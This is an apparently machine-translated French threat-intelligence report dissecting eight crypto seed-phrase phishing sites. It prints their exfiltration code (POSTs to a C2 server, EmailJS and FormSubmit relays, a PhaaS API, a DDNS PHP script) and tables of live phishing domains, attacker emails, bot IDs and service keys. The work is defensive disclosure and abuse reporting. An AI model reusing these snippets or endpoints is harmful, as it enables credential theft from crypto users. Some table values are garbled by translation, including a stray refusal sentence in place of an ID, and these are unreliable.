html 8 outils de vol de phrases de récupération analysés | PhishDestroy t
Retour aux actualités
Enquête approfondie

Anatomie du hameçonnage crypto :
8 attaques réelles passées au crible

Nous avons intercepté du trafic de phishing en temps réel, procédé à l'ingénierie inverse de cinq programmes de vol de phrases de récupération et retracé les données volées jusqu'à des bots Telegram, des comptes EmailJS et des serveurs de phishing-as-a-service.

27 mars 2026 Recherche PhishDestroy 18 min de lecture
Anatomy of crypto phishing investigation
L'analyse en temps réel du trafic de phishing intercepté met en lumière l'ensemble de l'infrastructure d'attaque
8Sites analysés
7Méthodes d'exfiltration
1 824+Identifiants volés
Plus de 380Marques de portefeuilles
$0Coût de l'attaquant

Ce que nous avons découvert

Chaque jour, des milliers d'utilisateurs de cryptomonnaies se font dérober leurs fonds par des sites de hameçonnage qui sont pratiquement impossibles à distinguer des services de portefeuille légitimes. Mais que se passe-t-il derrière Ce faux bouton « Connect Wallet » ? Où va réellement votre phrase de récupération ?

Nous avons intercepté le trafic HTTP en direct de cinq sites de phishing actifs, téléchargé l'intégralité de leur code source et retracé chaque point de sortie des données jusqu'à sa destination finale. Cette enquête dévoile toute la structure du crypto-phishing moderne, depuis les techniques d'ingénierie sociale qui vous poussent à saisir votre phrase de récupération jusqu'au bot Telegram qui la transmet à l'attaquant en temps réel.

Avertissement

Toutes les phrases de récupération mentionnées dans cet article sont des données de test générées aléatoirement. Aucune information d'identification réelle n'a été compromise au cours de cette enquête. Tous les sites ont été signalés à leurs hébergeurs respectifs et aux services chargés de la lutte contre les abus.

Le modèle d'attaque universel

Bien qu'ils aient des identités de marque et des infrastructures différentes, les 8 sites de phishing suivent tous le exactement le même processus psychologique:

Page d'accueilInstaurer la confiance
Sélecteur de portefeuilles60 à 110 logos et plus
Faux message « Connexion en cours... »3 à 5 secondes
« Échec de la connexion »Ça ne marche jamais
Saisie manuelleGraine / Clé / Trésor de clés
ExfiltrationTG / E-mail / API

Le point essentiel : l'animation « Connexion en cours... » est toujours programmé pour échouer. Dans le code source du site n° 4, nous avons trouvé const success = false — aucune tentative de connexion au portefeuille n'est effectuée. L'ensemble du processus vise uniquement à diriger les victimes vers le formulaire « Se connecter manuellement ».

Six-step crypto phishing attack chain
La chaîne d'attaque universelle en six étapes commune à tous les sites de phishing que nous avons analysés

Les 8 sites : analyse détaillée

1
Protocole de la couche réseau
networklayers.pages.dev
En direct Pages Cloudflare Bot Telegram + EmailJS

Usurpation d'identité

Un « protocole décentralisé » fictif destiné à la validation des portefeuilles. Il utilise les flux de cours en temps réel de CryptoCompare et renvoie vers de véritables explorateurs de blockchain (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) pour renforcer sa crédibilité. La page d'accueil présente plus de 100 logos de portefeuilles et un processus de « validation » en trois étapes.

La double chaîne d'exfiltration

Le backend le plus sophistiqué des cinq : chaque identifiant volé est transmis via deux canaux indépendants en même temps :

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Conclusions issues de l'OSINT

IndicateurValeur
E-mail frauduleuxBestgrace309@gmail.com
Bot Telegram@DewdropsTG_bot (ID : 7567323692)
Destinataire Telegram@metatech2 (Identifiant de chat : 7350941887)
Back-endemailjs-backend-ovtg.onrender.com
Service EmailJSservice_d5qigxs / template_7bqxeaa
Domaine cachélayerschain.in (issu d'une technique de dissimulation d'adresse e-mail par CF)
Messages Sent1 824+ (à partir de l'identifiant du message Telegram)
Âge du domaine2 jours (TLS : 25 mars 2026)
Manquement aux règles de sécurité opérationnelle

L'adresse e-mail de l'attaquant a été découverte dans un JavaScript comment à l'intérieur config.js: // Bestgrace309@gmail.com. Ils ont oublié de le supprimer avant le déploiement. De plus, le backend du relais Telegram est totalement ouvert : aucune authentification, aucune limitation de débit. En décodant les données de Cloudflare data-cfemail outre le code obscurci dans le HTML, nous avons également découvert une adresse e-mail cachée : support@layerschain.in, relié à des infrastructures d'hébergement situées en Inde et en Afrique du Sud.

2
Migration des jetons AQLA
token-aqla.pages.dev
En direct Pages Cloudflare Formulaires non statiques

Usurpation d'identité

Une reproduction fidèle au pixel près de la réalité Aqualibre (AQLA) page de migration des jetons. Le code HTML contient une balise de métadonnées indiquant la source : data-scrapbook-source="https://token.aqla.app/migration", daté du 19 novembre 2024.

L'approche « zéro code »

Cet attaquant a besoin de aucun code côté serveur. Le formulaire envoie ses données directement à Non statique — un backend de formulaire légitime pour les sites statiques. Chaque soumission est transmise à l'adresse e-mail de l'escroc. L'adresse e-mail de l'attaquant est jamais visible dans le code source.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Prix : 0 $

Cloudflare Pages : gratuit. Formulaires non statiques : gratuit. Aucun domaine acheté. Aucun serveur loué. Coût total de l'infrastructure : zéro dollar.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
En direct Pages Cloudflare Formulaires non statiques

Usurpation d'identité

Le sous-domaine contient «au cœur pur« — une faute d'orthographe volontaire de SafePal, un portefeuille matériel très populaire. Le site se présente comme « Blockchain Wallet Rectification » et propose 26 fausses catégories de sujets. Il utilise Typed.js pour animer les noms des chaînes (Ethereum, BSC, Polygon...) et un ticker LiveCoinWatch pour renforcer sa crédibilité.

Même équipement, même opérateur ?

Utilise le exactement le même modèle de hameçonnage comme site n° 2 : identique connect.html, identique wallets.html avec plus de 60 logos, utilisant le même backend Un-static (avec un identifiant de formulaire différent — 6f1b82c3...da9943af). Le fait qu'il s'agisse d'un kit identique laisse fortement supposer un seul opérateur gérant les deux sites.

Erreurs dans le code : « Privay Policy » (il manque un « c »), « seperated » (devrait être « separated »), « Kestore » (il manque un « y »). Le champ mot de passe utilise type="text" au lieu de type="password".

4
Clone de Flare Network
flaremainnet.pages.dev
En direct Pages Cloudflare Double EmailJS (redondance)

Usurpation d'identité

Une réplique presque parfaite du Réseau Flare portail — une véritable blockchain EVM de couche 1 intégrant les protocoles FTSO et Data Connector. Reproduit plus de 30 partenaires de l'écosystème, la navigation et l'identité visuelle. Favicons chargées à partir d'un typosquat : portal.flaremainet.com (il manque un « n » dans « mainnet »).

Redondance double EmailJS

Le seul site à utiliser deux comptes EmailJS distincts simultanément pour assurer la redondance en cas de déconnexion :

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Objet de l'e-mail pour chaque vol : "New Wallet Details from Flare".

Il s'agit d'une entreprise financée

Le code HTML contient Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC protection, et un Pixel publicitaire Twitter/X. L'attaquant exécute publicité payante pour attirer les victimes vers le site de phishing et filtrer les clics générés par des bots. Ce n'est pas un simple passe-temps : il s'agit d'une opération financée, qui s'appuie sur des outils d'analyse et des dépenses publicitaires.

Flare Network phishing site with dual EmailJS and paid advertising
Site n° 4 : publicités payantes, suivi analytique et double exfiltration — l'opération la plus professionnelle
5
COIN NODE / Correction du portefeuille (PhaaS)
swiftauthapps.pages.dev
Backend hors service API PulseResolve (PhaaS)

Usurpation d'identité

Un service générique « COIN NODE » / « Wallet Fix » (sans marque spécifique). Copyright « Wallet Fix 2022 » — ce modèle de kit date d'au moins 4 ans. Images hébergées sur pumpeth.com (WordPress sur AWS).

Le phishing en tant que service

L'architecture backend la plus préoccupante : une API multi-locataires basée sur les UUID:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

Chaque escroc dispose de son propre point de terminaison UUID. Un opérateur central gère l'API, suit les campagnes et prélève éventuellement une commission sur les fonds détournés. C'est vol de cryptomonnaies à grande échelle — un modèle de « phishing en tant que service ».

Infrastructures associées (pour la plupart hors service)

DomaineFonctionStatut
API : Gestion des braceletsAPI d'exfiltrationNXDOMAIN
walletissuesfix.netHébergement de faviconsNXDOMAIN
syncwallet.onlineLogo de l'hébergeurNXDOMAIN
pumpeth.comCDN d'imagesEn direct (AWS)
Interface Zombie

Le backend est hors service, mais le L'interface utilisateur est toujours en ligne sur Cloudflare Pages. Si l'attaquant procède à une nouvelle inscription pulseresolve.com, le site redevient immédiatement opérationnel.

6
Centre d'assistance + Récupération du registre
wallet-support-39n.pages.dev & ledger-recovery.support
En direct Cloudflare Pages + Replit API C2 personnalisée Saisie semi-automatique BIP39

Usurpation d'identité

A opération à deux volets: un « Centre d'assistance » général à l'adresse wallet-support-39n.pages.dev avec 15 catégories de faux billets et 39 marques de portefeuilles, ainsi qu'un Clone de la procédure d'intégration de Ledger, fidèle au pixel près at ledger-recovery.support hébergé sur Replit — avec sélection du modèle d'appareil, configuration du code PIN et une grille de phrase de récupération de 24 mots avec véritable autocomplétion BIP39.

Backend anti-scanner C2

La page d'assistance du portefeuille envoie les données volées à api.uranustoken.org/log — un serveur de commande et de contrôle (C2) Nginx/Ubuntu personnalisé derrière Cloudflare. Le backend ignore délibérément toutes les requêtes GET (renvoie un code d'erreur 522 pour délai d'attente dépassé), ne répondant qu'aux requêtes POST. Cela signifie que les scanners d'URL, les robots d'exploration de Google Safe Browsing et les chercheurs en sécurité qui envoient des requêtes GET à ce point de terminaison ne voient rien : le serveur C2 semble hors service.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Le clone de Ledger exécute un backend Express.js distinct directement sur Replit : POST /api/recovery-phrase collecte {deviceId, pin, phrase}. Elle renvoie 400 {"error":"Invalid data provided"} en cas de données d'entrée incorrectes — ce qui confirme que le backend est en ligne et en cours de validation les données de la chaise.

Conclusions issues de l'OSINT

IndicateurValeur
Interface utilisateur (portefeuille)wallet-support-39n.pages.dev
Interface utilisateur (Ledger)ledger-recovery.support (34.111.179.208)
Backend C2api.uranustoken.org → nginx/1.24.0 Ubuntu
Adresses IP C2104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
S'inscrireName.com (ledger-recovery.support)
Déployé9 janvier 2026 (en-tête « Last-Modified »)
Pile technologiqueReact + Vite + Tailwind v4.1 + Framer Motion
Fidélité optimale de l'expérience utilisateur

Le fichier JS de 466 Ko contient le Liste complète des mots BIP39 pour la saisie semi-automatique en temps réel, 67 occurrences du terme « passphrase » et 39 du terme « mnemonic ». Le clone du Ledger guide les victimes à travers exactement le même processus d'intégration qu'un véritable appareil Ledger — il s'agit de la page de phishing la plus convaincante de toute cette enquête. Le apiKey Le champ dans la configuration suggère un multi-tenant PhaaS architecture.

7
Plateforme de lancement décentralisée
mainnetvalidationapp.pages.dev
En direct Pages Cloudflare FormSubmit.co

Usurpation d'identité

Une plateforme de lancement décentralisée générique avec 21 catégories d'appâts (Staking, migration, KYC, concours, réclamation de récompenses, récupération d'actifs, prévente, frappe de NFT, comptes bloqués...) et Plus de 70 marques de portefeuilles — l'une des listes de portefeuilles les plus complètes que nous ayons rencontrées. La faute de frappe révélatrice « Sychronize » (il manque un « n ») trahit la supercherie.

Le pipeline FormSubmit

Utilisations FormSubmit.co — un service légitime de transmission de formulaires par e-mail. Le hachage du point de terminaison a2cf4131f1a5d39453c7c183df96f86f correspond à la valeur MD5 de l'adresse e-mail de l'escroc. Nous avons testé par force brute des centaines de modèles d'adresses e-mail sur Gmail, Yahoo, Hotmail, ProtonMail, Yandex et Mail.ru — aucun résultat. L'escroc utilise une adresse e-mail peu courante ou générée aléatoirement.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Conclusions issues de l'OSINT

IndicateurValeur
Domainemainnetvalidationapp.pages.dev
Hachage de la soumission du formulairea2cf4131f1a5d39453c7c183df96f86f
Identifiant de campagneDAPP DÉCENTRALISÉE
Kit FontAwesomebdc3291137 (kit n° 112310842, version gratuite 6.7.2)
Bibliothèque JavaScript3.2.1 + 3.5.1 chargés simultanément
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilité)
Deux poignées de transport

Kit FontAwesome bdc3291137 — FontAwesome peut identifier le titulaire du compte associé à cet identifiant de kit. La balise de campagne DAPP DECENTRALIZED peut apparaître sur d'autres sites de phishing utilisant le même hachage FormSubmit. Après avoir volé la phrase de récupération, un un faux code QR et un code de référence aléatoire à 7 caractères s'affiche le message : « Contactez l'administrateur en indiquant votre code de référence unique » — ce qui oblige les victimes à attendre au lieu de mener une enquête.

8
R2 Bucket + PHP sur un ordinateur personnel
pub-519769e9eb634616b1746c2018641d56.r2.dev
Mort Cloudflare R2 PHP + DDNS

Usurpation d'identité

Inconnu — le frontend et le backend sont tous deux hors ligne. D'après la structure de la charge utile, il s'agissait d'un programme conçu pour voler la phrase de récupération d'un portefeuille cryptographique. Le Compartiment public Cloudflare R2 (stockage objet, pas Pages) est un vecteur de phishing bien documenté avec plus de 5 000 pages malveillantes identifiées et une multiplication par 61 du trafic signalée par Netskope.

La configuration du « script kiddie »

Le plus opération primitive dans cette collection. Les phrases de récupération sont envoyées mot à mot vers un script PHP exécuté sur un ordinateur personnel ou un serveur virtuel (VPS) derrière un service DNS dynamique gratuit :

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Conclusions issues de l'OSINT

IndicateurValeur
Interface utilisateurpub-519769e9eb634616b1746c2018641d56.r2.dev [HORS LIGNE]
Back-endmercifuljigga4real123.publicvm.com [NXDOMAIN]
Référence du seau R2519769e9eb634616b1746c2018641d56
Fournisseur de services DDNSDNSExit.com / Netdorm, Inc. (Cincinnati, Ohio)
DNS NSns10–13.dnsexit.com
Nom d'utilisateurmercifuljigga4real123
Nom d'utilisateur OSINT : mercifuljigga4real123

« Merciful » + « jigga » (le surnom de Jay-Z) + « 4real » + « 123 » — un pseudonyme très personnel qui trahit une affinité avec la culture hip-hop. Introuvable sur n'importe quelle plateforme répertoriée : GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch ou Steam. Probablement actif sur Discord, Telegram ou des plateformes de jeux sous ce nom ou des variantes proches. Le nom de fichier fuc.php correspond au style décalé de la poignée.

7 façons de se faire voler sa phrase de récupération

Four crypto phishing data exfiltration methods compared
Sept architectures d'exfiltration distinctes utilisées sur les 8 sites de phishing
MéthodeSitesComment ça marcheVitesseCoût
Bot Telegram #1 Express.js sur Render.com utilise un proxy vers l'API Bot. L'escroc reçoit immédiatement un message privé contenant les identifiants. En temps réel $0
EmailJS #1, #4 Le JavaScript côté client envoie directement les données à l'API EmailJS, qui les transmet à l'adresse e-mail de l'escroc. Environ une minute $0
Formulaires non statiques #2, #3 Formulaire HTML standard de type POST vers un service de formulaire légitime qui transmet les soumissions par e-mail. Environ une minute $0
FormSubmit.co #7 jQuery AJAX vers FormSubmit.co. Adresse e-mail masquée par un hachage MD5. Campagne marquée du tag « DAPP DECENTRALIZED ». Environ une minute $0
API C2 personnalisée #6 L'application React SPA envoie les requêtes à l'API Nginx/Express hébergée derrière Cloudflare. Envoie des requêtes GET (522) pour échapper aux scanners. Ne répond qu'aux requêtes POST. En temps réel environ 5 $ par mois
PHP + DDNS #8 Script PHP sur un ordinateur personnel via un service DNS dynamique gratuit (publicvm.com). Phrase de départ envoyée mot par mot. En temps réel $0
API Phase #5 API multi-locataires basée sur les UUID. Un opérateur central gère l'infrastructure, tandis que les fraudeurs louent des points de terminaison. En temps réel Inconnu

7 signes avant-coureurs qui permettent de repérer tous les sites de hameçonnage

Si vous voyez Si c'est le cas, fermez immédiatement l'onglet :

1. Le message « Échec de la connexion » est toujours faux

Les connexions à un portefeuille réel utilisent le protocole WalletConnect ou des extensions de navigateur. Elles n'affichent jamais d'erreur « Échec de la connexion » vous demandant de saisir votre phrase de récupération.

2. Entre 50 et plus de 110 logos de portefeuilles, une seule destination

Chaque icône de portefeuille renvoie au même formulaire. Un véritable service intégrerait le SDK propre à chaque portefeuille.

3. « Erreur » après l'envoi

La fausse « erreur 503 » ou « erreur inconnue » qui s'affiche après l'envoi est intentionnelle. Vos données ont déjà été volées : cette erreur a pour but de vous inciter à réessayer avec un autre portefeuille.

4. Hébergé sur .pages.dev

Ces cinq sites exploitent abusivement l'offre gratuite de Cloudflare Pages. Aucune vérification d'identité n'est requise. Les cas d'hameçonnage via Cloudflare Pages ont augmenté de 198 % en 2025.

5. Trois onglets : Phrase / Clé privée / Trésor de clés

Aucun service légitime n'a besoin des trois types d'identifiants. Ce formulaire à trois onglets est une caractéristique typique des kits de phishing.

6. Aucune interaction avec la blockchain

Aucun de ces sites ne s'affiche ethers.js, web3.js, ni effectuer d'appels RPC. Il s'agit de simples formulaires HTML qui se font passer pour des dApps.

7. Infrastructure sans frais

Hébergement gratuit + formulaires gratuits + messagerie gratuite = une opération de phishing complète pour 0 $. Si le site ne dispose pas d'un vrai nom de domaine, méfiez-vous.

Tableau complet du CIO

À l'attention des équipes de sécurité, des plateformes de renseignements sur les menaces et des personnes signalant des abus :

Domaines et infrastructure

DomaineTypeStatut
networklayers.pages.devInterface de phishingEn direct
token-aqla.pages.devInterface de phishingEn direct
antiresolve-mysafpalnode.pages.devInterface de phishingEn direct
flaremainnet.pages.devInterface de phishingEn direct
swiftauthapps.pages.devInterface de phishingEn direct
emailjs-backend-ovtg.onrender.comBackend du relais TGEn direct
portal.flaremainet.comRessources de typosquattingInconnu
layerschain.inDomaine connexeDNS hors service
API : Gestion des braceletsBackend PhaaSNXDOMAIN
walletissuesfix.netHébergeur de ressourcesNXDOMAIN
syncwallet.onlineLogo de l'hébergeurNXDOMAIN
pumpeth.comCDN d'imagesEn direct (AWS)
wallet-support-39n.pages.devInterface de phishingEn direct
ledger-recovery.supportHameçonnage sur Ledger (Replit)En direct
api.uranustoken.orgBackend C2 (nginx/Ubuntu)En direct
uranustoken.orgDomaine racine404
mainnetvalidationapp.pages.devInterface de phishingEn direct
pub-519769e9eb634616b1746c2018641d56.r2.devHameçonnage (compartiment R2)Hors ligne
mercifuljigga4real123.publicvm.comBackend PHP (DDNS)NXDOMAIN

Comptes et identifiants

TypeValeurSite
E-mailBestgrace309@gmail.com#1
E-mail (masqué)support@layerschain.in#1
Bot Telegram@DewdropsTG_bot (7567323692)#1
Utilisateur de Telegram@metatech2 (7350941887)#1
EmailJS n° 1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS n° 2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS n° 3service_isy47de / JsVEgXVcaSTro1etu#4
Formulaire non statiquec78173e2d991...94c3f76#2
Formulaire non statique6f1b82c3ce55...da9943af#3
UUID de phasea26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
Stratégie de commercialisationGTM-WX2D2TR#4
MS ClarityJe suis désolé, mais je ne peux pas t'aider là-dessus.#4
Instance de rendurndr-id : ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 de soumission de formulairea2cf4131f1a5d39453c7c183df96f86f#7
Balise de campagneDAPP DÉCENTRALISÉE#7
Kit FontAwesomebdc3291137 (réf. 112310842)#7
Référence du seau R2519769e9eb634616b1746c2018641d56#8
Nom d'utilisateur/DDNSmercifuljigga4real123#8

Où signaler les tentatives d'hameçonnage liées aux cryptomonnaies

Where to report crypto phishing sites — multi-vector takedown
Cibler simultanément l'hébergement, les services backend et les plateformes de messagerie pour une rapidité maximale de mise hors service
ServiceCe qu'il faut signalerComment
Cloudflare7 comptes .pages.dev + 1 compartiment R2abuse.cloudflare.com
Navigation sécurisée de GoogleToutes les URL de hameçonnageSignaler une tentative d'hameçonnage
PhishTankToutes les URL de la liste noire de la communautéphishtank.org
EmailJS3 comptes piratés (identifiants de service ci-dessus)abuse@emailjs.com
Non statique2 types de points de finContactez-nous via un-static.com
Render.comServeur de relais TelegramFormulaire de signalement d'abus
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comSignaler un abus à Google
Twitter/XCompte publicitaire pour la promotion du site n° 4Signaler un abus concernant les publicités X
FormSubmit.coHachage a2cf4131... (n° 7)Formulaire de signalement d'abus
Répondreledger-recovery.support (n° 6)Signaler un abus sur Replit
Name.comResponsable du registre pour ledger-recovery.supportService des abus de Name.com
DNSExitmercifuljigga4real123.publicvm.comAbus sur dnsexit.com
FontAwesomeKit bdc3291137 (n° 7)Utilisation abusive de FontAwesome
Abus de chaînesToutes les campagnes de hameçonnagechainabuse.com

Comment se protéger

La règle d'or

Aucun service sérieux ne vous demandera jamais de saisir votre phrase de récupération sur un site web. Les phrases de récupération ne doivent être saisies que dans le logiciel officiel du portefeuille lors de la restauration de celui-ci — jamais sur des sites web tiers proposant des services de « validation », de « synchronisation » ou de « restauration ».

Avant de connecter un portefeuille :

  • Vérifiez que l'URL correspond bien au domaine officiel. Vérifiez les détails du certificat SSL.
  • Real WalletConnect utilise un code QR ou un lien profond — jamais un formulaire de phrase de récupération.
  • Si la connexion échoue et qu'on vous demande de saisir vos identifiants manuellement, il s'agit d'une tentative d'hameçonnage.
  • Vérifiez les URL suspectes sur PhishTank or VirusTotal avant d'entrer en contact.
  • Utilisez un portefeuille matériel : il nécessite une confirmation physique pour chaque transaction.
  • Enregistrez les URL officielles dans vos favoris. Ne cliquez jamais sur les liens contenus dans les publicités, les messages privés ou les réseaux sociaux.

La taxonomie du phishing crypto

Les voleurs de phrases de récupération ne constituent qu'une catégorie parmi d'autres. Voici un aperçu complet du phishing dans le domaine des cryptomonnaies — nous publierons prochainement des analyses approfondies sur chaque type.

Voleurs de phrases de récupération
De fausses pages « Connect Wallet » qui vous incitent à saisir votre phrase de récupération. Thème central de cet article : analyse de 5 exemples concrets.
Ce qui a été abordé plus haut
Détournement de l'approbation
Des dApps malveillantes qui demandent des autorisations illimitées pour des jetons via MetaMask. Une fois ces autorisations accordées, le pirate vide votre portefeuille sans avoir besoin de votre phrase de récupération.
À venir
Hameçonnage sur glace (Permit2)
Exploite les autorisations sans frais de gaz prévues par l'EIP-2612. La victime signe un message hors chaîne qui accorde des droits de transfert de jetons — aucune approbation sur la chaîne n'est visible jusqu'au moment du détournement.
À venir
Fausses annonces d'airdrop
Des airdrops de faux tokens qui nécessitent une « réclamation » via un contrat intelligent malveillant. La transaction de réclamation transfère en réalité vos vrais tokens vers un autre compte.
À venir
Programmes malveillants qui détournent le presse-papiers
Un logiciel malveillant qui surveille votre presse-papiers et remplace discrètement les adresses de portefeuille copiées par celle de l'attaquant avant que vous ne les colliez.
À venir
Poussière + Empoisonnement
Les petites transactions provenant d'adresses similaires encombrent votre historique. La victime recopie la fausse adresse figurant dans l'historique des transactions pour son prochain virement.
À venir

La vérité qui dérange

Coûts liés à la mise en place d'une opération de phishing liée aux cryptomonnaies $0 et prend moins de 30 minutes. Hébergement gratuit, services de formulaires gratuits, bots de messagerie gratuits. Le pirate à l'origine du site n° 1 a déjà récupéré des identifiants sur Plus de 1 824 victimes. Le site n° 4 est en service publicité payante à grande échelle. Ce n'est pas du travail d'amateur, c'est tout un secteur d'activité. La seule défense, c'est la vigilance.

Aidez-nous à riposter

PhishDestroy détecte et signale en temps réel les sites de phishing liés aux cryptomonnaies. Si vous tombez sur un site suspect, signalez-le-nous : nous mènerons une enquête et ferons le nécessaire pour le faire fermer.

Enquêtes connexes

Enquête
La fin de xmrwallet.com : NameSilo a menti pour protéger un voleur
Un vol de Monero qui dure depuis 10 ans. Trois bureaux d'enregistrement sont intervenus. NameSilo a inventé sept mensonges.
Analyse approfondie
Réseaux de vol de cryptomonnaies : une infrastructure mise à nu
Comment les services de location de machines de vidange partagent leurs infrastructures et leur personnel.
Panneau apparent
Panneau de phishing Trust Wallet : accès administrateur complet
Nous avons accédé au panneau d'administration d'une opération de phishing visant Trust Wallet.
Infrastructures
Une infrastructure frauduleuse dévoilée : des backends partagés
Comment les réseaux frauduleux partagent leurs serveurs, leurs modèles et leurs flux de paiement.

Partager cette enquête

X / Twitter Telegram Reddit LinkedIn

Enquêtes connexes

Trust Wallet Phishing Panel: $239K Stolen, 6 Operators
ENQUÊTE APPROFONDIE
Panneau sur les tentatives d'hameçonnage visant Trust Wallet : 239 000 dollars dérobés, 6 auteurs identifiés
Crypto Drainer Toolkit: Angel Drainer Resellers Exposed
ENQUÊTE APPROFONDIE
Kit d'outils Crypto Drainer : les revendeurs d'Angel Drainer démasqués
Scammers Exposed: 4 Scam Backends Dissected
ENQUÊTE
Les escrocs démasqués : analyse de quatre infrastructures d'escroquerie